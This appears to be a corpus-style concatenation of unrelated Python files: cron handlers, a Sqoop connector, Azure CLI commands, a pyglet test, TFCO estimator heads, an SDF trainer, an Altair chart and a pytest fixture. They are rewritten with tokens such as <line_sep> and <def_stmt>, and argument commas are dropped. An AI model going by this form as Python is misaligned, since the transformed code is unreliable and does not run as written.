one_week_start_dt=now+datetime.timedelta(days=7 hours=-1)<line_sep>one_week_end_dt=now+datetime.timedelta(days=7)<line_sep># Notify all users whose Exemptions now have less than 24 hours left. This
# will act as a final reminder, and will also ensure that even users who
# choose a 1-day Exemption will get an email warning (for what it's worth).
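# Both notification windows are one hour wide, so a cron schedule that runs
# hourly (assumed here) reports each Exemption exactly once.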
one_day_start_dt=now+datetime.timedelta(days=1 hours=-1)<line_sep>one_day_end_dt=now+datetime.timedelta(days=1)<line_sep>tuples=[(one_week_start_dt one_week_end_dt) (one_day_start_dt one_day_end_dt)]<line_sep># Defer a task for each batch of notifications.
<for_stmt>start_dt,end_dt tuples<block_start>deferred.defer(_NotifyExpirationsInRange start_dt end_dt _queue=constants.TASK_QUEUE.EXEMPTIONS)<block_end><block_end><block_end><class_stmt>ExpireExemptions(handler_utils.CronJobHandler)<block_start>"""Handler for expiring exemptions."""<def_stmt>get self<block_start>logging.info('Expiring Exemptions...')<line_sep>now=datetime.datetime.utcnow()<line_sep>exm_query=exemption_models.Exemption.query(exemption_models.Exemption.state<eq>EXEMPTION_STATE.APPROVED exemption_models.Exemption.deactivation_dt<le>now)<line_sep>exm_count=0<for_stmt>exm exm_query<block_start>deferred.defer(exemption_api.Expire exm.key _queue=constants.TASK_QUEUE.EXEMPTIONS)<line_sep>exm_count<augadd>1<block_end>monitoring.expired_exemptions.Set(exm_count)<line_sep>logging.info('Deferred %d Exemption(s) for expiration' exm_count)<block_end><block_end>ROUTES=routes.PathPrefixRoute('/exemptions' [webapp2.Route('/process' handler=ProcessExemptions) webapp2.Route('/notify-upcoming-expirations' handler=NotifyUpcomingExpirations) webapp2.Route('/expire' handler=ExpireExemptions) ])<line_sep> |
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_future_stmt> absolute_import<import_from_stmt>builtins object<import_stmt>logging<import_from_stmt>desktop.lib.python_util force_dict_to_strings<import_from_stmt>sqoop.client.config Config<class_stmt>Connector(object)<block_start><def_stmt>__init__ self id name version link_config job_config config_resources={} **kwargs<block_start>self.id=id<line_sep>self.name=name<line_sep>self.version=version<line_sep>self.job_config=job_config<line_sep>self.link_config=link_config<line_sep>self.config_resources=config_resources<line_sep>setattr(self 'class' kwargs['class'])<block_end>@staticmethod<def_stmt>from_dict connector_dict<block_start>connector_dict.setdefault('link_config' [])<line_sep>connector_dict['link_config']=[Config.from_dict(link_config_dict)<for>link_config_dict connector_dict['link-config']]<line_sep>connector_dict.setdefault('job_config' {})<line_sep>connector_dict['job_config']={}<if_stmt>'FROM'<in>connector_dict['job-config']<block_start>connector_dict['job_config']['FROM']=[Config.from_dict(from_config_dict)<for>from_config_dict connector_dict['job-config']['FROM']]<block_end><if_stmt>'TO'<in>connector_dict['job-config']<block_start>connector_dict['job_config']['TO']=[Config.from_dict(to_config_dict)<for>to_config_dict connector_dict['job-config']['TO']]<block_end>connector_dict['config_resources']=connector_dict['all-config-resources']<line_sep><return>Connector(**force_dict_to_strings(connector_dict))<block_end><def_stmt>to_dict self<block_start>d={'id':self.id 'name':self.name 'version':self.version 'class':getattr(self 'class') 'link-config':[link_config.to_dict()<for>link_config self.link_config] 'job-config':{} 'all-config-resources':self.config_resources}<if_stmt>'FROM'<in>self.job_config<block_start>d['job-config']['FROM']=[job_config.to_dict()<for>job_config self.job_config['FROM']]<block_end><if_stmt>'TO'<in>self.job_config<block_start>d['job-config']['TO']=[job_config.to_dict()<for>job_config self.job_config['TO']]<block_end><return>d<block_end><block_end> |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
<import_from_stmt>azure.cli.core.util sdk_no_wait<def_stmt>healthcareapis_service_show client resource_group_name resource_name<block_start><return>client.get(resource_group_name=resource_group_name resource_name=resource_name)<block_end># We use this function for both create and update, since it calls the SDK's create_or_update.
<def_stmt>healthcareapis_service_create client resource_group_name resource_name kind location tags=<none> etag=<none> identity_type=<none> access_policies=<none> cosmos_db_configuration=<none> authentication_configuration=<none> cors_configuration=<none> private_endpoint_connections=<none> public_network_access=<none> export_configuration_storage_account_name=<none> no_wait=<false><block_start>properties={'access_policies':access_policies 'authentication_configuration':authentication_configuration 'cors_configuration':cors_configuration 'cosmos_db_configuration':cosmos_db_configuration 'private_endpoint_connections':private_endpoint_connections 'public_network_access':public_network_access}<if_stmt>export_configuration_storage_account_name<is><not><none><block_start>properties['export_configuration']={'storage_account_name':export_configuration_storage_account_name}<block_end>service_description={'name':resource_name 'kind':kind 'location':location 'etag':etag 'properties':properties 'tags':tags}<if_stmt>identity_type<is><not><none><block_start>service_description['identity']={'principal_id':<none> 'tenant_id':<none> 'type':identity_type }<block_end><else_stmt><block_start>service_description['identity']={'principal_id':<none> 'tenant_id':<none> 'type':"None" }<block_end><return>sdk_no_wait(no_wait client.create_or_update resource_group_name=resource_group_name resource_name=resource_name service_description=service_description)<block_end> |
<import_stmt>pyglet<import_from_stmt>pyglet.gl *<line_sep># pyglet.options['debug_gl_shaders'] = True
window=pyglet.window.Window(width=540 height=540 resizable=<true>)<line_sep>batch=pyglet.graphics.Batch()<line_sep>print("OpenGL Context: {}".format(window.context.get_info().version))<line_sep>##########################################################
# TESTS !
##########################################################
label=pyglet.text.Label("This is a test" x=0 y=180 dpi=200 color=(255 25 255 150) batch=batch)<line_sep>vertex_list=pyglet.graphics.vertex_list(3 ('position3f' (100 300 0 200 250 0 200 350 0)) ('colors4f' (1 0 0 1 0 1 0 1 0.3 0.3 1 1)))<def_stmt>create_quad_vertex_list x y z width height<block_start><return>x y z x+width y z x+width y+height z x y+height z<block_end>batch.add_indexed(4 GL_TRIANGLES <none> [0 1 2 0 2 3] ('position3f' create_quad_vertex_list(480 270 -11 50 50)) ('colors4f' (1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1)))<line_sep>batch.add_indexed(4 GL_TRIANGLES <none> [0 1 2 0 2 3] ('position3f' (400 400 0 400+50 400 0 400+50 400+50 0 400 400+50 0)) ('colors4f' (1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1)))<line_sep>img=pyglet.image.load("pyglet.png")<line_sep>img.anchor_x=img.width<floordiv>2<line_sep>img.anchor_y=img.height<floordiv>2<line_sep>red=pyglet.image.SolidColorImagePattern((255 0 0 255)).create_image(50 50)<line_sep>green=pyglet.image.SolidColorImagePattern((0 255 0 255)).create_image(50 50)<line_sep>blue=pyglet.image.SolidColorImagePattern((0 0 255 255)).create_image(50 50)<line_sep>white=pyglet.image.SolidColorImagePattern((255 255 255 255)).create_image(50 50)<line_sep>sprites=[pyglet.sprite.Sprite(img=img x=60 y=80 batch=batch) pyglet.sprite.Sprite(img=img x=110 y=90 batch=batch) pyglet.sprite.Sprite(img=img x=160 y=100 batch=batch) pyglet.sprite.Sprite(img=img x=210 y=110 batch=batch)]<for_stmt>sprite sprites<block_start>sprite.opacity=220<block_end>sprite2=pyglet.sprite.Sprite(img=red x=200 y=400 batch=batch)<line_sep>sprite3=pyglet.sprite.Sprite(img=green x=300 y=300 batch=batch)<line_sep>sprite4=pyglet.sprite.Sprite(img=blue x=400 y=200 batch=batch)<line_sep>sprite5=pyglet.sprite.Sprite(img=white x=500 y=100 batch=batch)<line_sep>standalone_sprite=pyglet.sprite.Sprite(img=white x=600 y=0)<line_sep>##########################################################
# Modify the sprite scale value by scrolling the mouse
##########################################################
@window.event<def_stmt>on_mouse_scroll x y mouse direction<block_start><for_stmt>spr sprites<block_start>spr.scale<augadd>direction/10<block_end><block_end>###########################################################
#
###########################################################
@window.event<def_stmt>on_draw <block_start>window.clear()<line_sep># pyglet.graphics.draw(3, GL_TRIANGLES, ('position3f', (100, 100, 0, 200, 100, 0, 150, 200, 0)),
# ('colors3f', (1, 0.5, 0.2, 1, 0.5, 0.2, 1, 0.5, 0.2)))
#
# pyglet.graphics.draw_indexed(4, GL_TRIANGLES, [0, 1, 2, 0, 2, 3],
# ('position2i', (225, 300, 250, 300, 250, 325, 225, 325)),
# ('colors3f', (0.5, 1, 0.2, 0.5, 0.2, 1, 0.2, 0.5, 1, 1, 0.5, 0.2)))
vertex_list.draw(GL_TRIANGLES)<line_sep>batch.draw()<line_sep>standalone_sprite.draw()<block_end><def_stmt>update dt<block_start><for_stmt>sprite sprites<block_start>sprite.rotation<augadd>100<times>dt%360<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>pyglet.gl.glClearColor(0.2 0.3 0.3 1)<line_sep>pyglet.clock.schedule_interval(update 1/60)<line_sep>pyglet.app.run()<block_end> |
# Copyright 2018 The TensorFlow Constrained Optimization Authors. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""TFCO estimator head for use with TensorFlow 1.x and 2.x.
The classes `HeadV1` and `HeadV2` allow you to create custom heads that can be
used with a `tf.Estimator` to solve a constrained minimization problem
in TF 1.x and 2.x respectively. You would need to provide an existing `_Head`
for TF 1.x and a `tf.estimator.Head` for TF 2.x and a function specifying
a constrained minimization problem, and the base head's minimization ops
will be modified accordingly.
Example
=======
Consider a binary classification problem, where we wish to train a
LinearEstimator by minimizing error rate subject to a recall constraint. For
this, we will first create a function that takes "logits", "labels",
"features", and an (optional) "weight_column", and returns the
`RateMinimizationProblem`.
```python
def problem_fn(logits, labels, features, weight_column=None):
context = tfco.rate_context(predictions=logits, labels=labels)
objective=tfco.error_rate(context)
problem = tfco.RateMinimizationProblem(
objective=tfco.error_rate(context),
constraints=[tfco.recall(context) >= 0.9])
return problem
```
In TF 2.x, we will then create a `tfco.HeadV2` instance from a base
`BinaryClassHead` instance and the `problem_fn` defined above.
```python
base_head = tf.estimator.BinaryClassHead()
custom_head = tfco.HeadV2(base_head, problem_fn)
```
The final step is to create a `LinearEstimator` using the custom head.
```python
estimator = tf.estimator.LinearEstimator(head=custom_head, ...)
```
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow_constrained_optimization.python.train constrained_optimizer<import_from_stmt>tensorflow_constrained_optimization.python.train lagrangian_optimizer<class_stmt>_WrapperHead(tf.estimator.Head)<block_start>"""Base class for `HeadV1` and `HeadV2`.
This class is a wrapper around an existing base head, which can be either a
V1 `_Head` instance or a V2 `Head` instance. While this class implements the
`tf.estimator.Head` interface provided in TensorFlow 2.x, it can be used to
wrap both a V1 and V2 head instance, as they have similar signatures. Some of
the functions implemented may be relevant for only a V1 or V2 head.
"""<def_stmt>__init__ self base_head problem_fn weight_column=<none><block_start>"""Initializes a `_WrapperHead` instance that wraps the `base_head`.
Args:
base_head: A V1 `_Head` instance or a V2 `tf.estimator.Head` instance.
problem_fn: A function that takes logits, labels and features as input,
and returns a `ConstrainedMinimizationProblem` instance.
weight_column: Optional string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to re-weight examples during training. This may be
an optional argument to the base_head, but it needs to be passed
again here as `weight_column` is not usually publicly accessible in the
base_head.
"""<line_sep>self._base_head=base_head<line_sep>self._problem_fn=problem_fn<line_sep>self._weight_column=weight_column<block_end>@property<def_stmt>name self<block_start>"""The name of this head.
Returns:
A string.
"""<line_sep><return>self._base_head.name<block_end>@property<def_stmt>logits_dimension self<block_start>"""Size of the last dimension of the logits `Tensor`.
Often is the number of classes, labels, or real values to be predicted.
Typically, logits is of shape `[batch_size, logits_dimension]`.
Returns:
The expected size of the `logits` tensor.
"""<line_sep><return>self._base_head.logits_dimension<block_end><def_stmt>create_loss self features mode logits labels<block_start>"""Returns a loss Tensor from provided logits.
The returned loss is the same as that of the base head and is meant
solely for book-keeping purposes. We do not return the custom loss used to
create the train_op for constrained optimization, as this loss makes use of
auxiliary variables whose values may not be set properly in EVAL mode. This
function is relevant only for a V1 estimator.
Args:
features: Input `dict` of `Tensor` objects.
mode: Estimator's `ModeKeys`.
logits: logits `Tensor` to be used for loss construction.
labels: Labels `Tensor`, or `dict` of same.
Returns:
`LossSpec`.
"""<line_sep><return>self._base_head.create_loss(labels logits features mode)<block_end>@property<def_stmt>loss_reduction self<block_start>"""One of `tf.losses.Reduction`.
Returns the same value as the base head, and does not reflect how TFCO
aggregates its losses internally. This function is relevant only for a V2
estimator.
Returns:
The type of loss reduction used in the head.
"""<line_sep># TODO: Should we return SUM_OVER_BATCH_SIZE, as this better
# represents TFCO's aggregation strategy, and may be used for rescaling
# purposes during distributed training?
<return>self._base_head.loss_reduction<block_end><def_stmt>predictions self logits keys=<none><block_start>"""Returns a `dict` of predictions from provided logits.
This function is relevant only for a V2 estimator.
Args:
logits: Logits `Tensor` to be used for prediction construction.
keys: A list of `string` for prediction keys. Defaults to `None`, meaning
if not specified, predictions will be created for all the pre-defined
valid keys in the head.
Returns:
A `dict` of predicted `Tensor` keyed by prediction name.
"""<line_sep><return>self._base_head.predictions(logits keys)<block_end><def_stmt>metrics self regularization_losses=<none><block_start>"""Returns a `dict` of metric objects.
This function is relevant only for a V2 estimator.
Args:
regularization_losses: A list of additional scalar losses to be added to
the training loss, such as regularization losses.
Returns:
A `dict` of metrics keyed by string name. The value is an instance of
`Metric` class.
"""<line_sep><return>self._base_head.metrics(regularization_losses)<block_end><def_stmt>update_metrics self eval_metrics features logits labels mode=<none> regularization_losses=<none><block_start>"""Updates metric objects and returns a `dict` of the updated metrics.
This function is relevant only for a V2 estimator.
Args:
eval_metrics: A `dict` of metrics to be updated.
features: Input `dict` mapping string feature names to `Tensor` or
`SparseTensor` objects containing the values for that feature in a
minibatch. Often to be used to fetch example-weight tensor.
logits: logits `Tensor` to be used for metrics update.
labels: Labels `Tensor`, or `dict` mapping string label names to `Tensor`
objects of the label values.
mode: Estimator's `ModeKeys`. In most cases, this arg is not used and can
be removed in the method implementation.
regularization_losses: A list of additional scalar losses to be added to
the training and evaluation loss, such as regularization losses. Note
that the `mode` arg is not used in the `tf.estimator.Head`. If the
update of the metrics doesn't rely on `mode`, it can be safely ignored
in the method signature.
Returns:
A `dict` of updated metrics keyed by name. The value is an instance of
`Metric` class.
"""<line_sep><return>self._base_head.update_metrics(eval_metrics features logits labels mode regularization_losses)<block_end><def_stmt>loss self labels logits features=<none> mode=<none> regularization_losses=<none><block_start>"""Returns a loss `Tensor` from provided arguments.
The returned loss is the same as that of the base head and is meant
solely for book-keeping purposes. We do not return the custom loss used to
create the train_op for constrained optimization, as this loss makes use of
auxiliary variables whose values may not be set properly in EVAL mode. This
function is relevant for a V2 estimator.
Args:
labels: Labels `Tensor`, or `dict` mapping string label names to `Tensor`
objects of the label values.
logits: Logits `Tensor` to be used for loss construction.
features: Input `dict` mapping string feature names to `Tensor` or
`SparseTensor` objects containing the values for that feature in a
minibatch. Often to be used to fetch example-weight tensor.
mode: Estimator's `ModeKeys`. To be used in case loss calculation is
different in Train and Eval mode.
regularization_losses: A list of additional scalar losses to be added to
the training loss, such as regularization losses.
Returns:
A scalar `Tensor` representing a dummy loss.
"""<line_sep><return>self._base_head.loss(labels logits features mode regularization_losses)<block_end><def_stmt>_create_no_op_estimator_spec self features mode logits labels<block_start>"""Returns `EstimatorSpec` for the base head with no `train_op`."""<line_sep><return>self._base_head.create_estimator_spec(features=features mode=mode logits=logits labels=labels train_op_fn=<lambda>loss:tf.constant(0) regularization_losses=<none>)<block_end><def_stmt>_create_problem_and_update_optimizer self logits labels features optimizer<block_start>"""Returns `ConstrainedMinimizationProblem` created using `_problem_fn`."""<line_sep>problem=self._problem_fn(logits labels features weight_column=self._weight_column)<line_sep># Set the number of constraints in the optimizer. This is needed if
# `num_constraints` hasn't already been specified to the optimizer, and
# will also check that we aren't changing the number of constraints from
# a previously-specified value.
optimizer.num_constraints=problem.num_constraints<line_sep><return>problem<block_end><def_stmt>_append_update_ops self train_op_fn update_ops<block_start>"""Returns `train_op` with control dependency on `update_ops`."""<line_sep># We handle the case of update_ops=None separately because calling
# tf.control_dependencies(None) in graph mode clears existing control
# dependencies.
<if_stmt>update_ops<is><none><block_start>train_op=train_op_fn()<block_end><else_stmt><block_start><with_stmt>tf.control_dependencies(update_ops)<block_start>train_op=train_op_fn()<block_end><block_end><return>train_op<block_end><block_end><class_stmt>HeadV1(_WrapperHead)<block_start>"""A wrapper around an existing V1 `_Head` for use with TensorFlow 1.x.
This head modifies the base head's train_op to minimize a
`ConstrainedMinimizationProblem` specified via `problem_fn`, while
preserving the base head's other functionality. If the estimator's optimizer
is an instance of `ConstrainedOptimizerV1`, that optimizer is used for minimization.
If not, it creates a `ConstrainedOptimizerV1` instance from the estimator's
optimizer.
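For example, to wrap a V1 binary classification head (a minimal sketch:
it assumes `problem_fn` is defined as in the module-level example, and
that a V1 head constructor such as
`tf.contrib.estimator.binary_classification_head` is available in your
TF 1.x installation):
```python
base_head = tf.contrib.estimator.binary_classification_head()
custom_head = tfco.HeadV1(base_head, problem_fn)
estimator = tf.estimator.LinearEstimator(head=custom_head, ...)
```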
"""<def_stmt>__init__ self base_head problem_fn weight_column=<none><block_start>"""Initializes a `HeadV1` instance that wraps the `base_head`.
Args:
base_head: A `_Head` instance.
problem_fn: A function that takes logits, labels and features as input,
and returns a `ConstrainedMinimizationProblem` instance.
weight_column: Optional string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to re-weight examples during training. This may be
an optional argument to the base_head, but it needs to be passed
again here as `weight_column` is not usually publicly accessible in the
base_head.
Raises:
ValueError: If a `tf.estimator.Head` instance is passed as the
`base_head`.
"""<if_stmt>isinstance(base_head tf.estimator.Head)<block_start><raise>ValueError("You cannot pass a `tf.estimator.Head` instance as the "<concat>"`base_head` to `HeadV1`.")<block_end>super(HeadV1 self).__init__(base_head problem_fn weight_column)<block_end><def_stmt>create_estimator_spec self features mode logits labels=<none> optimizer=<none> train_op_fn=<none> regularization_losses=<none><block_start>"""Returns `EstimatorSpec` that a model_fn can return.
Args:
features: Input `dict` of `Tensor` or `SparseTensor` objects.
mode: Estimator's `ModeKeys`.
logits: logits `Tensor` to be used by the head.
labels: Optional labels `Tensor`, or `dict` mapping string label names to
`Tensor` objects of the label values.
optimizer: A `ConstrainedOptimizerV1` or a `tf.compat.v1.train.Optimizer`.
instance. If a `tf.compat.v1.train.Optimizer` is provided, the head
creates a `ConstrainedOptimizerV1` that wraps it. This is an optional
argument in the `_Head` base class, but needs to be passed here.
train_op_fn: This argument is ignored and can be left unspecified.
regularization_losses: This argument is ignored and can be left
unspecified.
Returns:
`EstimatorSpec`.
"""<line_sep>estimator_spec=self._create_no_op_estimator_spec(features=features mode=mode logits=logits labels=labels)<line_sep># When mode is PREDICT or EVAL, no modification needed to the base head.
<if_stmt>(mode<eq>tf.estimator.ModeKeys.PREDICT)<or>(mode<eq>tf.estimator.ModeKeys.EVAL)<block_start><return>estimator_spec<block_end># When mode is TRAIN, replace train_op in estimator_spec.
<if_stmt>mode<eq>tf.estimator.ModeKeys.TRAIN<block_start><if_stmt>optimizer<is><none><block_start><raise>ValueError("You must provide an optimizer to the estimator.")<block_end># TODO: Add support for passing train_op_fn.
# If the optimizer is not a `ConstrainedOptimizerV1` instance, then
# create a `LagrangianOptimizerV1` that wraps the base head's optimizer.
<if_stmt><not>isinstance(optimizer constrained_optimizer.ConstrainedOptimizerV1)<block_start>optimizer=lagrangian_optimizer.LagrangianOptimizerV1(optimizer)<block_end>problem=self._create_problem_and_update_optimizer(logits labels features optimizer)<line_sep># Create `train_op` with a control dependency on `UPDATE_OPS`.
update_ops=tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)<line_sep>global_step=tf.compat.v1.train.get_global_step()<line_sep>train_op=self._append_update_ops(<lambda>:optimizer.minimize(problem global_step=global_step) update_ops)<line_sep><return>estimator_spec._replace(train_op=train_op)<block_end><raise>ValueError("mode={} not recognized".format(mode))<block_end><block_end><class_stmt>HeadV2(_WrapperHead)<block_start>"""A wrapper around an existing V2 `Head` for use with TensorFlow 2.x.
This head modifies the base head's train_op to minimize a
`ConstrainedMinimizationProblem` specified via `problem_fn`, while
preserving the base head's other functionality. If the estimator's optimizer
is an instance of `ConstrainedOptimizerV2`, that optimizer is used for minimization.
If not, it creates a `ConstrainedOptimizerV2` instance from the estimator's
optimizer.
"""<def_stmt>__init__ self base_head problem_fn weight_column=<none><block_start>"""Initializes a `HeadV2` instance that wraps the `base_head`.
Args:
base_head: A `tf.estimator.Head` instance.
problem_fn: A function that takes logits, labels and features as input,
and returns a `ConstrainedMinimizationProblem` instance.
weight_column: Optional string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to re-weight examples during training. This may be
an optional argument to the base_head, but it needs to be passed
again here as `weight_column` is not usually publicly accessible in the
base_head.
Raises:
ValueError: If a `tf.estimator.Head` instance is not passed as
the `base_head`.
"""<if_stmt><not>isinstance(base_head tf.estimator.Head)<block_start><raise>ValueError("You must pass a `tf.estimator.Head` instance as "<concat>"`base_head` to `HeadV2`.")<block_end>super(HeadV2 self).__init__(base_head problem_fn weight_column)<block_end><def_stmt>create_estimator_spec self features mode logits labels=<none> optimizer=<none> trainable_variables=<none> train_op_fn=<none> update_ops=<none> regularization_losses=<none><block_start>"""Returns `EstimatorSpec` for constrained optimization.
The `EstimatorSpec` is the same as that of the base head with the
`train_op` alone replaced with one for minimizing the constrained
minimization problem specified by self._problem_fn.
Args:
features: Input `dict` mapping string feature names to `Tensor` or
`SparseTensor` objects containing the values for that feature in a
minibatch. Often to be used to fetch example-weight tensor.
mode: Estimator's `ModeKeys`.
logits: Logits `Tensor` to be used by the head.
labels: Optional labels `Tensor`, or `dict` mapping string label names to
`Tensor` objects of the label values.
optimizer: A `ConstrainedOptimizerV2` or a `tf.keras.optimizers.Optimizer`
instance. If a `tf.keras.optimizers.Optimizer` is provided, the head
creates a `ConstrainedOptimizerV2` that wraps it. This is an optional
argument in the `tf.estimator.Head` base class, but needs to be passed
here.
trainable_variables: A list or tuple of `Variable` objects to update to
solve the constrained minimization problem. In Tensorflow 1.x, by
default these are the list of variables collected in the graph under the
key `GraphKeys.TRAINABLE_VARIABLES`. As Tensorflow 2.x doesn't have
collections and GraphKeys, trainable_variables needs to be passed
explicitly here.
train_op_fn: This argument is ignored and can be left unspecified.
update_ops: Optional list or tuple of update ops to be run at training
time. For example, layers such as BatchNormalization create mean and
variance update ops that need to be run at training time. In Tensorflow
1.x, these are thrown into an UPDATE_OPS collection. As Tensorflow 2.x
doesn't have collections, update_ops needs to be passed explicitly here.
regularization_losses: This argument is ignored and can be left
unspecified.
Returns:
`EstimatorSpec`.
Raises:
ValueError: If mode is not recognized or optimizer is not specified in
TRAIN mode.
"""<line_sep>estimator_spec=self._create_no_op_estimator_spec(features=features mode=mode logits=logits labels=labels)<line_sep># When mode is PREDICT or EVAL, no modification needed to the base head.
<if_stmt>(mode<eq>tf.estimator.ModeKeys.PREDICT)<or>(mode<eq>tf.estimator.ModeKeys.EVAL)<block_start><return>estimator_spec<block_end># When mode is TRAIN, replace train_op in estimator_spec.
<if_stmt>mode<eq>tf.estimator.ModeKeys.TRAIN<block_start><if_stmt>optimizer<is><none><block_start><raise>ValueError("You must provide an optimizer to the estimator.")<block_end># TODO: Add support for passing train_op_fn.
# If the optimizer is not a `ConstrainedOptimizerV2` instance, then
# create a `LagrangianOptimizer` that wraps the base head's optimizer.
<if_stmt><not>isinstance(optimizer constrained_optimizer.ConstrainedOptimizerV2)<block_start>iterations=optimizer.iterations<line_sep>optimizer=lagrangian_optimizer.LagrangianOptimizerV2(optimizer)<line_sep># Pass the iterations member (which contains the global step) in the
# base head's optimizer to the newly created one.
optimizer.iterations=iterations<block_end>problem=self._create_problem_and_update_optimizer(logits labels features optimizer)<line_sep># Create `train_op` with a control dependency on the `update_ops`.
var_list=trainable_variables+list(problem.trainable_variables)+optimizer.trainable_variables()<line_sep>train_op=self._append_update_ops(<lambda>:tf.group(optimizer.get_updates(problem var_list)) update_ops)<line_sep><return>estimator_spec._replace(train_op=train_op)<block_end><raise>ValueError("mode={} not recognized".format(mode))<block_end><block_end> |
<import_stmt>torch<import_stmt>argparse<import_from_stmt>sdf.utils *<if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('path' type=str)<line_sep>parser.add_argument('--test' action='store_true' help="test mode")<line_sep>parser.add_argument('--workspace' type=str default='workspace')<line_sep>parser.add_argument('--seed' type=int default=0)<line_sep>parser.add_argument('--lr' type=float default=1e-4 help="initial learning rate")<line_sep>parser.add_argument('--fp16' action='store_true' help="use amp mixed precision training")<line_sep>parser.add_argument('--ff' action='store_true' help="use fully-fused MLP")<line_sep>parser.add_argument('--tcnn' action='store_true' help="use TCNN backend")<line_sep>opt=parser.parse_args()<line_sep>print(opt)<line_sep>seed_everything(opt.seed)<if_stmt>opt.ff<block_start><assert_stmt>opt.fp16 "fully-fused mode must be used with fp16 mode"<import_from_stmt>sdf.netowrk_ff SDFNetwork<block_end><elif_stmt>opt.tcnn<block_start><assert_stmt>opt.fp16 "tcnn mode must be used with fp16 mode"<import_from_stmt>sdf.network_tcnn SDFNetwork<block_end><else_stmt><block_start><import_from_stmt>sdf.netowrk SDFNetwork<block_end>model=SDFNetwork(encoding="hashgrid")<line_sep>print(model)<if_stmt>opt.test<block_start>trainer=Trainer('ngp' model workspace=opt.workspace fp16=opt.fp16 use_checkpoint='best' eval_interval=1)<line_sep>trainer.save_mesh(os.path.join(opt.workspace 'results' 'output.ply') 1024)<block_end><else_stmt><block_start><import_from_stmt>sdf.provider SDFDataset<import_from_stmt>loss mape_loss<line_sep>train_dataset=SDFDataset(opt.path size=100 num_samples=2<power>18)<line_sep>train_loader=torch.utils.data.DataLoader(train_dataset batch_size=1 shuffle=<true>)<line_sep>valid_dataset=SDFDataset(opt.path size=1 num_samples=2<power>18)# just a dummy
valid_loader=torch.utils.data.DataLoader(valid_dataset batch_size=1)<line_sep>criterion=mape_loss# torch.nn.L1Loss()
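# Two parameter groups: the hash-grid encoding is trained without weight decay,
# while the MLP backbone uses a small weight decay (1e-6).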
optimizer=<lambda>model:torch.optim.Adam([{'name':'encoding' 'params':model.encoder.parameters()} {'name':'net' 'params':model.backbone.parameters() 'weight_decay':1e-6} ] lr=opt.lr betas=(0.9 0.99) eps=1e-15)<line_sep>scheduler=<lambda>optimizer:optim.lr_scheduler.StepLR(optimizer step_size=10 gamma=0.1)<line_sep>trainer=Trainer('ngp' model workspace=opt.workspace optimizer=optimizer criterion=criterion ema_decay=0.95 fp16=opt.fp16 lr_scheduler=scheduler use_checkpoint='latest' eval_interval=1)<line_sep>trainer.train(train_loader valid_loader 20)<line_sep># also test
trainer.save_mesh(os.path.join(opt.workspace 'results' 'output.ply') 1024)<block_end><block_end> |
"""
Scatter Plot with Minimap
-------------------------
This example shows how to create a miniature version of a plot
such that creating a selection in the miniature version
adjusts the axis limits in another, more detailed view.
"""<line_sep># category: scatter plots
<import_stmt>altair<as>alt<import_from_stmt>vega_datasets data<line_sep>source=data.seattle_weather()<line_sep>zoom=alt.selection_interval(encodings=["x" "y"])<line_sep>minimap=(alt.Chart(source).mark_point().add_selection(zoom).encode(x="date:T" y="temp_max:Q" color=alt.condition(zoom "weather" alt.value("lightgray")) ).properties(width=200 height=200 title="Minimap -- click and drag to zoom in the detail view" ))<line_sep>detail=(alt.Chart(source).mark_point().encode(x=alt.X("date:T" scale=alt.Scale(domain={"selection":zoom.name "encoding":"x"})) y=alt.Y("temp_max:Q" scale=alt.Scale(domain={"selection":zoom.name "encoding":"y"}) ) color="weather" ).properties(width=600 height=400 title="Seattle weather -- detail view"))<line_sep>detail|minimap<line_sep> |
<import_from_stmt>copy deepcopy<import_stmt>pytest<line_sep>@pytest.fixture<def_stmt>real_oldcase_database real_panel_database parsed_case# add case with old case id construct
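# (the old-style case _id format is '<owner>-<display_name>', rebuilt below from the parsed case)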
<block_start>config_data=deepcopy(parsed_case)<line_sep>config_data["case_id"]="-".join([config_data["owner"] config_data["display_name"]])<line_sep>case_obj=real_panel_database.load_case(config_data)<line_sep># add suspect and causative!
institute_obj=real_panel_database.institute(case_obj["owner"])<line_sep>user_obj=real_panel_database.users()[0]<line_sep>variant_obj=real_panel_database.variant_collection.find_one()<line_sep>real_panel_database.pin_variant(institute=institute_obj case=case_obj user=user_obj link="" variant=variant_obj )<line_sep>real_panel_database.mark_causative(institute=institute_obj case=case_obj user=user_obj link="" variant=variant_obj )<line_sep># add ACMG evaluation
real_panel_database.submit_evaluation(variant_obj=variant_obj user_obj=user_obj institute_obj=institute_obj case_obj=case_obj link="" criteria=[{"term":"PS1"} {"term":"PM1"}] )<line_sep># add comment on a variant
